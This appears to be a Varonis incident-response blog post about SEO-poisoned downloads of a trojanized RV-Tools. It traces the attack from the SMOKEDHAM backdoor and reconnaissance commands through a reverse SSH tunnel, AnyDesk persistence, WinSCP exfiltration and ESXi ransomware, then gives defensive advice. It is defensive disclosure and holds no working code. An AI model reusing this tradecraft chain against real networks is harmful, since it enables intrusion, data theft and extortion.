Attackers are increasingly directing malicious payloads toward IT admins, posing as legitimate tools using Search Engine Optimization (SEO) techniques to move their payloads toward the top of search results.
The compromise of an administrative account can lead to rapid data exfiltration and encryption (ransomware), usually in a double-pronged attack with the threat actor demanding a ransom not only to decrypt the existing data but also a separate payment to not leak stolen data.
As organizations become more adept at protecting their networks from common initial access techniques such as phishing, we’re observing a higher prevalence of SEO poisoning waterhole-style attacks.
Tom Barnea and Simon Biggs from our Varonis MDDR Forensics team has recently worked on multiple cases where SEO poisoning played a role in Initial Access by the threat. We hope this guidance, provided by Varonis’ Tom Barnea and Simon Biggs, helps other organizations learn about the threat and improve their overall defensive posture.
What is SEO Poisoning?
SEO poisoning refers to the use of common online marketing techniques alongside malicious actions to boost the ranking of threat actor-controlled websites across major search engines such as Google. This leads unsuspecting users to think the content is trustworthy.
Attackers disguise malicious payloads as well-known tools hosted on these sites, utilising the reputation of the tool name along with their top result status in search engines to fool admins into believing they are downloading non-malicious software.
In fact, the malicious payload will often include the legitimate masqueraded software but in the background, it may be establishing a command-and-control backdoor.
Initial Access and Persistence
Our MDDR team observed the Initial Access of a cyber threat into a customer’s network after a Domain Admin searched for and downloaded a weaponized version of RV-Tools, a VMware monitoring and management utility. In this instance, the malicious code ran alongside the legitimate version of the software with no immediate indication of compromise.
Once executed, the malicious payload led to the deployment of a PowerShell-based .NET backdoor commonly referred to as SMOKEDHAM. This backdoor provided the threat actor with persistent access to the device in question and opened the door for additional in-network malicious activity.
A diagram of the infection chain is shown below:
Attack flow summary diagram
Discovery
Following the initial execution of the SMOKEDHAM backdoor, the adversary was observed running several reconnaissance-focused commands, including but not limited to the following:
- whoami – Used to obtain user information
- systeminfo – Used to obtain system information
- nslookup REDACTED.local – Used to obtain DNS/Domain information
- gpresult /r – Used to obtain Group Policy settings
The results of these commands were saved to a file located in C:\ProgramData and subsequently uploaded to an attacker-controlled AWS EC2 instance via curl. Shortly thereafter, the threat actor deployed an employee-monitoring software known as Kickidler renamed to ’grabber.exe’.
This software enabled the threat actor to surreptitiously monitor machines with capabilities such as screenshotting the desktop and logging keystrokes on victim machines, enabling further compromise.
Lateral Movement
There was a significant pause in observed threat actor activity that lasted for several days after Kickidler's deployment. The reasoning for this is not 100% known, but our main theory is that the delay provided time for additional credentials to be captured. It is also possible that the initial attack was part of an automated process, and hands-on keyboard activity had not yet occurred.
Activity resumed with lateral movement to multiple servers via Remote Desktop Protocol (RDP) and PsExec — two very common techniques we observe when carrying out breach response.
The threat actor carried out additional network discovery actions, such as network and share scanning, during this period as they attempted to learn more about the customer’s network.
UBA Alerts highlighting early anomalous behavior by the compromised accounts
Additional Command and Control
Our team observed additional persistence deployment from the threat in the form of KiTTY, a tool that facilitates SSH communications, deployed with the obfuscated name of fork.exe.
This was used to create a reverse tunnel for RDP traffic over SSH to the previously mentioned EC2 instance over port 443. Masquerading traffic on the HTTPS port (443) is a common tactic for threat actors since blocking this requires a next-gen firewall capable of inspecting all application-layer traffic.
Port 443 is often open to allow web browser traffic and less-mature organizations typically do not have tools that will inspect application-layer protocols to block non-HTTPS traffic traversing 443 — something threat actors are aware of and abuse on a regular basis.
In addition, the threat actor was also observed deploying Remote Monitoring and Management (RMM) utility AnyDesk as an additional C2 and persistence mechanism on several devices.
One source of AnyDesk execution via Prefetch Analysis. Multiple other evidence sources such as AnyDesk log files informed additional AnyDesk activities in the environment.
Exfiltration
The threat actor then began targeting file servers by installing the well-known file transfer application WinSCP and subsequently using this to mass-exfiltrate data into their EC2 instance.
In this case, we observed the attacker successfully transfer nearly a terabyte of data out of the network — a huge breach with severe consequences
A review of file activity for the compromised users demonstrated a clear access spike related to data exfiltration
Data encryption
At this point in the engagement, the actor had completed most of their objectives minus the final one — encryption of data for ransom.
The primary encryption target was the customer's ESXi devices. With Domain Admin access, the attacker accessed the relevant ESXi servers and encrypted the underlying VMDK files, which resulted in significant disruption to the customer's business.
Ransomware note example
Good intentions can often lead to unintended consequences
A seemingly harmless action, such as downloading what appeared to be a well-known IT utility, set off a domino effect that culminated in severe consequences: sensitive data exfiltration, large-scale encryption, and a massive compromise of critical users and assets.
It is crucial to plan your security posture using the principle of “Defense in Depth.” As cybersecurity defenders, it is critical to ensure comprehensive security across all seven layers of cybersecurity — from the human layer to data and mission-critical assets.
Defensive recommendations
There were multiple areas along the cyber kill chain where additional monitoring, defensive measures, or automation could have helped this victim rapidly catch, contain, and evict the threat actor.
Some of the key defensive recommendations our team suggests others incorporate include:
- Mission-critical assets
- Audit and harden access to business crown jewels such as Domain Controllers, databases, etc.
- Restricting this access to specific subnets or forcing an MFA challenge can help to reduce this attack vector further
- Data security layer
- Auditing access to data and associated privileges is key to understanding and detecting attacks
- Being able to accurately classify impacted data is crucial for understanding the scope of an incident, as well as assessing potential damage from both the legal and business perspectives
- Endpoint security layer
- Have a strong Endpoint Detection and Response (EDR) solution in place across all assets to monitor them constantly and respond to threats effectively
- Application security layer
- Implement policies for application allow-listing to prevent unknown threats
- Prioritize blocking system administration tools that could be exploited by threat actors, such as RMM or file transfer utilities
- Network layer
- To thwart lateral movement by threat actors, implement network segmentation using VLANs or micro-segmentation to isolate critical assets
- Restrict remote access protocols and enforce stringent security group policies for users and devices, ensuring access is granted based on the least privilege principle
- Perimeter security layer
- Use URL filtering to block access to potentially harmful websites, including newly registered domains, file-sharing domains, etc.
- Restrict network traffic to prevent connections to Cloud Service Providers or File Sharing sites as much as possible, as threat actors often abuse these for C2 and Exfiltration
- Human layer
- Employee training is key to providing strong cyber knowledge and helping employees recognize potentially suspicious links, emails, or files
- Educate users to verify URLs before entering credentials or downloading files, and use bookmarks for frequently visited sites to avoid typosquatting traps
Don’t wait for a breach to occur.
Even with the best training, policies, and infrastructure, breaches will happen.
Implementing strong defensive policies helps to ensure that when a breach occurs, the damage is minimized, and the threat is caught and stopped as soon as possible.
Varonis can help detect compromised users and devices before major damage occurs using User and Entity Behavior Analysis (UEBA). Identifying compromised assets before they can cause a major business impact is a key step in improving any organization’s overall security posture.
Detecting this type of activity as early in the cyber kill chain as possible is critical to reducing the blast radius of any potential breach and minimizing damage to the enterprise.
Ready to see how we do it in action? Schedule a quick, 30-minute demo with our team. We'll show you how our cloud-native solution can cover all your data security needs, plus answer any questions you have.
